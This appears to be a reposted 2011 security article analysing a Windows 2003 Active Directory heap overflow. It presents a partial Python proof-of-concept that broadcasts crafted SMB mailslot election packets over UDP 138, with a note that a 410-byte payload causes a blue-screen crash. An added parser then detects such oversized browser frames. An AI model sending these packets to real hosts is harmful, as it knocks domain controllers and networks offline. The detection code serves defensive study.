
Win2003 Active Directory Heap Overflow Vulnerability Analysis (2)

Time: 2011-11-06 13:53   Source: unknown   Compiled by: 寂涯网络


from socket import *
import sys

# The helpers lengthlittle(), lengthbig(), encodename() and smbheaderudp(), and the
# globals ourip, srcname and dstname, are not on this page; they belong to the first
# part of the script. The def line below is reconstructed from the call in sockbroad().
def trans2mailslot(tid, ip, sname, dname, namepipe="\\MAILSLOT\\BROWSE",
                   srcservice="\x41\x41\x00", dstservice="\x41\x41\x00", pbrowser=""):
    packetbrowser  = pbrowser            # browser frame (opcode + body) carried as mailslot data
    packetmailslot = "\x01\x00"          # setup word 1: opcode 1 = write mailslot
    packetmailslot+= "\x00\x00"          # setup word 2: priority
    packetmailslot+= "\x02\x00"          # setup word 3: class 2 = unreliable & broadcast
    packetmailslot+= lengthlittle(packetbrowser+namepipe, 4)   # byte count
    packetmailslot+= namepipe + "\x00"   # mailslot name "\MAILSLOT\BROWSE", NUL-terminated
    packetdatagram = "\x11"              # NetBIOS Datagram Service: DIRECT_GROUP datagram
    packetdatagram+= "\x02"              # flags
    packetdatagram+= tid                 # datagram id, 0x8022
    packetdatagram+= inet_aton(ip)       # source IP, ip = ourip = 192.168.100.243
    packetdatagram+= "\x00\x8a"          # source port (138)
    packetdatagram+= "\x00\xa7"          # datagram length (patched at the end)
    packetdatagram+= "\x00\x00"          # packet offset
    packetdatagramname = encodename(sname, srcservice)    # source name
    packetdatagramname+= encodename(dname, dstservice)    # destination name
    smbheader = smbheaderudp("\x25")     # start the SMB header, command 0x25 = Transaction
    packetrans2 = "\x11"                 # SMB TransRequest: word count (14 + 3 setup words)
    packetrans2+= "\x00\x00"             # total parameter count
    packetrans2+= lengthlittle(packetbrowser, 0)   # total data count
    packetrans2+= "\x00\x00"             # max parameter count
    packetrans2+= "\x00\x00"             # max data count
    packetrans2+= "\x00"                 # max setup count
    packetrans2+= "\x00"                 # reserved
    packetrans2+= "\x00\x00"             # flags
    packetrans2+= "\xe8\x03\x00\x00"     # timeout (1000 ms)
    packetrans2+= "\x00\x00"             # reserved
    packetrans2+= "\x00\x00"             # parameter count
    packetrans2+= "\x00\x00"             # parameter offset
    packetrans2+= lengthlittle(packetbrowser, 0)   # data count
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot, 4)   # data offset
    packetrans2+= "\x03"                 # setup count
    packetrans2+= "\x00"                 # reserved
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot, 2)
    lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc, 0)   # patch the datagram length field
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host, sourceservice, destservice, packet):
    s = socket(AF_INET, SOCK_DGRAM)
    s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
    s.bind(('0.0.0.0', 13800))   # originally 138, but any unused port on this machine will do
    try:
        packsmbheader = smbheaderudp("\x25")
        buffer0 = trans2mailslot(tid="\x80\x22", ip=ourip, sname=srcname, dname=dstname,
                                 namepipe="\\MAILSLOT\\BROWSER", srcservice=sourceservice,
                                 dstservice=destservice, pbrowser=packet)
        s.sendto(buffer0, (host, 138))
    except:
        print "expected SDL error:", sys.exc_info()[0]
        raise

# election("A" * 410) is what triggers the fault and causes the overflow; if the number of
# constructed "A" characters is below 55, no blue screen results.
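The script above shows only the sending side. As an added example (not code from the original article), the following parses the same structure from the receiving side: the 14-byte NetBIOS datagram header, the two first-level-encoded NetBIOS names, the SMB_COM_TRANSACTION word block, and the mailslot name and DataCount that follow it, and flags \MAILSLOT\BROWSE writes whose data block is far larger than any real announcement or election frame. The 64-byte threshold, the WORKGROUP names and the 192.0.2.10 source address are assumptions made for this example; build_sample constructs the test frames locally rather than reading captured traffic.

```python
import struct

NB_NAME_LEN = 34       # 0x20 length byte + 32 half-ASCII chars + NUL terminator
MAX_BROWSER_DATA = 64  # threshold chosen for this example; real election frames are smaller

def encode_nb_name(name, suffix):
    """First-level encode a NetBIOS name: 15 space-padded chars plus a suffix byte."""
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return b"\x20" + bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0xF) + 0x41)) + b"\x00"

def decode_nb_name(field):
    """Inverse of encode_nb_name; returns (name, suffix)."""
    e = field[1:33]
    raw = bytes(((e[i] - 0x41) << 4) | (e[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]

def parse_mailslot_datagram(pkt):
    """Return mailslot name, data length and data from a NetBIOS datagram carrying
    an SMB_COM_TRANSACTION (0x25) mailslot write; None for anything else."""
    if len(pkt) < 14 + 2 * NB_NAME_LEN + 61 or pkt[0] not in (0x10, 0x11, 0x12):
        return None
    src = decode_nb_name(pkt[14:14 + NB_NAME_LEN])          # names follow the 14-byte header
    dst = decode_nb_name(pkt[14 + NB_NAME_LEN:14 + 2 * NB_NAME_LEN])
    smb = pkt[14 + 2 * NB_NAME_LEN:]
    if smb[:4] != b"\xffSMB" or smb[4] != 0x25 or smb[32] < 14:
        return None
    data_count, data_off = struct.unpack("<HH", smb[55:59])  # DataCount / DataOffset words
    name_start = 61 + 2 * smb[59] + 2                        # skip setup words and ByteCount
    mailslot = smb[name_start:smb.index(b"\x00", name_start)].decode("ascii", "replace")
    return {"src": src, "dst": dst, "mailslot": mailslot, "data_count": data_count,
            "data": smb[data_off:data_off + data_count]}

def is_oversized_browser_frame(pkt):
    """Flag a \\MAILSLOT\\BROWSE write whose data block exceeds MAX_BROWSER_DATA."""
    info = parse_mailslot_datagram(pkt)
    return bool(info and info["mailslot"].upper().startswith("\\MAILSLOT\\BROWSE")
                and info["data_count"] > MAX_BROWSER_DATA)

def build_sample(data, slot=b"\\MAILSLOT\\BROWSE"):
    """Constructed test frame (not captured traffic): WORKGROUP<1e> -> WORKGROUP<1d>."""
    name = slot + b"\x00"
    data_off = 32 + 1 + 28 + 6 + 2 + len(name)  # header, WordCount, words, setup, ByteCount, name
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, len(data), 0, 0, 0, 0, 0, 1000,
                        0, 0, 0, len(data), data_off, 3, 0)
    smb = (b"\xffSMB\x25" + b"\x00" * 27 + b"\x11" + words + b"\x01\x00\x00\x00\x02\x00"
           + struct.pack("<H", len(name) + len(data)) + name + data)
    body = encode_nb_name("WORKGROUP", 0x1e) + encode_nb_name("WORKGROUP", 0x1d) + smb
    hdr = struct.pack("!BBH4sHHH", 0x11, 0x02, 0x8022, b"\xc0\x00\x02\x0a", 138, len(body), 0)
    return hdr + body
```

Feeding this the UDP/138 payloads from a capture gives a per-frame DataCount, which is the field that separates a normal election frame from the 410-byte one the article describes.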

Page URL: http://www.jybase.net/xitonganquan/20111106574.html
